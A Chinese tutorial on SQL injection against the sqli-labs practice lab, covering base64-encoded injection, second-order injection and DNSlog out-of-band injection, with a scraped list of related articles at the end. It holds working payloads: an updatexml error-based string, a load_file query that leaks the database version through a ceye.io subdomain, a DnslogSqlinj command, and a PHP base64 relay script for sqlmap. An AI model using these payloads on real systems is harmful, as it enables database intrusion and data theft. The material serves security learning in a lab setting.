SQL注入之什么是加密注入|二次漏洞注入|DNSlog注入
加密注入、二次漏洞注入、DNSlog注入
加密注入:
什么是加密注入??下面将由一个例子阐述:
以sqlilabs-less-21为例
1.在登录界面输入账户密码提交抓包
2.在抓到这条数据,将umane的值进行base64解密:
解密结果为admin(注:%3D
就是=号)
在admin的基础上进行修改,bb修改为:
admin' or updatexml(1,concat(0x7e,(version())),0) or '
以上代码为盲注中的报错注入(不懂的请点我)
再进行base64加密,加密结果为:
YWRtaW4nIG9yIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLCh2ZXJzaW9uKCkpKSwwKSBvciAn,再将值替换,转发出去即可。
如下图,在右边区域爆出了数据库的名字
二次注入漏洞
二次注入漏洞就是在代码内部运作时产生的漏洞(代码的问题),一般黑盒测试不出结果,只有白盒测试才能进行测试
以sqlilabs-less-24为例
例如一个最简单的例子:
当注册一个账号aaaa后,再另外注册一个账号aaaa’#,当你登录修改aaaa’#的密码时,你会惊奇的发现,修改的却是aaaa的密码
原因是因为在他的源代码中有这么一句:
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
当我们传入aaaa’#时,'$username'
变为'aaaa'#
形成了闭合,并用#号注释掉了后面的内容
所以在修改aaaa’#的密码时,就会修改到aaaa的头上
DNSlog注入:
DNSlog的主要作用是:
解决盲注无法回显,效率低的问题
1.注册并登录平台:ceye.io,找到主页获取Identifier
把下列中sql语句中的identifier的值(plnxji.ceye.io)替换成你自己的值
select * from users where id=1 and if((select load_file(concat('\\\\',(select version()),'.plnxji.ceye.io\\abc'))),1,0);
在网站里的DNS Qucry即可看到,已经爆出了version()的值
当然,上面的操作还是稍微有点繁琐的,推荐一款工具:
https://github.com/ADOOO/DnslogSqlinj
解压缩工具后,需要在工具中的config.py文件配置addr和api(就是网站后台那两个值)
运行脚本(我这里用的python2.7.13):
运行软件时,下图已经给出了命令格式(下面也有很多参数可用,这里就不详讲了)
运行,等待结果:
python dnslogSql.py -u "http://192.168.56.217:8080/sqlilabs/less-9/?id=1' and ({})--+"
下图即可看到成功查出用户权限以及数据库名
补充:
在加密注入的基础上,如果你使用了一款工具不自带base64加解密怎么办?
说明:用以下代码的目的是提供一个base64的中转,例如:http://xxxx/?id=MQ==,其中MQ==是1
通过base64加密得来的,但是你使用的工具不认得这个数据,如何解决这个问题呢???
php脚本中转
使用php写法有一定的优势,例如通过浏览器访问127.0.0.1/test.php?x=
,这里提供了一个中转的接口,可以使用注入工具直接跑这个地址即可实现中转:
#文件名为:test.php
<? php
$url="http://xxxx/about_us.php?ID="; #目标站点,例如某站id后面都是base64加密的内容
$payload=base64_encode($_GET['x']); #设定一个被x值,被base64加密并赋值
echo $payload;
$urls=$url.$payload; #将目标站点和被base64加密后的x拼接起来
file_get_contents($urls);
echo $urls;
?>
测试:
例如使用sqlmap进行测试(实质上sqlmap是有base64功能的,这里只做学习使用):
python sqlmap.py -u '127.0.0.1/test.php?x=' -v 3
python写法
python写法,我就随便写了写,好像没多大用处,用php写法比较实用。
url="http://xxxx/?id="
#coding: utf-8
import request
import base64
encodeStrTest = base64.encodestring("{id}".format(id=input("")))
urls=url+encodeStrTest
print(urls)
下图,输入1即可自动将转换为base64的值拼接到原网站上
相关文章:
你知道吗?你用的大马可能早就被植入了后门!
如何利用xss拿下一个站的权限?
渗透测试常用靶场集合
SQL注入之什么是加密注入|二次漏洞注入|DNSlog注入相关推荐
- (17)网络安全:cookie注入、二次注入、DNSlog注入、中转注入、堆叠注入的原理及注入过程
目录 cookie注入 sqli-lasb-master less-21 方法一:用burpsuite进行抓包后修改 方法二:安装火狐的cookie manager等插件进行修改cookie 第一步: ...
- [网络安全提高篇] 一〇四.网络渗透靶场Oracle+phpStudy本地搭建万字详解(SQL注入、XSS攻击、文件上传漏洞)
当您阅读到该篇文章时,作者已经将"网络安全自学篇"设置成了收费专栏,首先说声抱歉.感谢这一年来大家的阅读和陪伴,这100篇安全文章记录了自己从菜鸡到菜鸟的成长史,该部分知识也花了很 ...
- SQL注入-盲注-时间注入-报错注入-布尔盲注-DNSlog注入-宽字节注入-WAF绕过-SqlMap使用
Sqli-labs的安装 1.安装WAMP http://www.wampserver.com/ WAMP是php + mysql + Apache环境集成工具 2.下载Sqli-labs https ...
- WAF——针对Web应用发起的攻击,包括但不限于以下攻击类型:SQL注入、XSS跨站、Webshell上传、命令注入、非法HTTP协议请求、非授权文件访问等...
核心概念 WAF Web应用防火墙(Web Application Firewall),简称WAF. Web攻击 针对Web应用发起的攻击,包括但不限于以下攻击类型:SQL注入.XSS跨站.Websh ...
- 基于spring自动注入及AOP的表单二次提交验证
2019独角兽企业重金招聘Python工程师标准>>> 这几天在网上闲逛,看到了几个关于spring的token二次提交问题,受到不少启发,于是自己动手根据自己公司的项目框架结构,制 ...
- SQL注入漏洞(postgresql注入)
以前孤陋寡闻对postgresql这个数据库少有了解,后来与几个目前在企业实习的朋友聊天才得知他们有的公司项目用的是postgresql,有的公司是正在将原本的数据库迁移到postgresql.可见p ...
- SQL注入——DNSLOG注入
SQL注入--DNSLOG注入 SQL注入--DNSLOG注入 SQL注入--DNSLOG注入 一.原理 一.原理 当我们遇到盲注漏洞的时候,注入过程没有回显,手工测试会花费大量的时间,如果用sqlm ...
- 永磁同步电机无速度传感器控制(二)——脉振高频注入法(一)【位置估计原理】
1.高频注入法 前面已经讲过了一种无速度传感器实现方法--滑模观测器法.在开始一个新的位置估计策略之前,我们先聊一聊这个方法本身的特点.从前面对滑模的讲述可知,滑模观测器法是通过构造一个滑模面,然后设 ...
- Java 过滤器解决URLSQL注入漏洞、跨站漏洞、框架注入漏洞、链接注入漏洞
一. 漏洞描述 1. 检测到目标URL存在SQL注入漏洞 很多WEB应用中都存在SQL注入漏洞.SQL注入是一种攻击者利用代码缺陷进行攻击的方式,可在任何能够影响数据库查询的应用程序参数中利用.例如u ...
最新文章
- centos 安装 NTFS支持
- poj1905(二分查找)
- 数据分析中会常犯哪些错误,如何解决的?
- C# VC HTTP POST GET(转)
- java基础之HashTable和HashMap的区别
- chengxuyuan
- 信息学奥赛一本通C++语言——1097: 画矩形
- linux shell脚本举例,Shell脚本去重的几种方法实例
- A*寻路算法的探寻与改良(一)
- Kotlin实战【一】Kotlin定义与目的
- Mac远程连接Linux桌面教程
- 斐讯K1K2刷机固件教程!最新最全整理版!(小米路由、newifi通用)
- hermite插值matlab代码,hermite插值以及两种MATLAB程序
- Lattice diamond软件中的Clarity Designer 与 IPexpress切换
- 如何在路由上封掉某个ip或某个断口
- 结构体中的LNode与*LinkList
- HTML的三种页面布局方式
- word审阅 去除word回车换行时出现的竖线的方法
- 天大《电子商务网站设计与管理》大作业期末考核
- 如何用乐高积木式操作让 ChatGPT 变得更强大?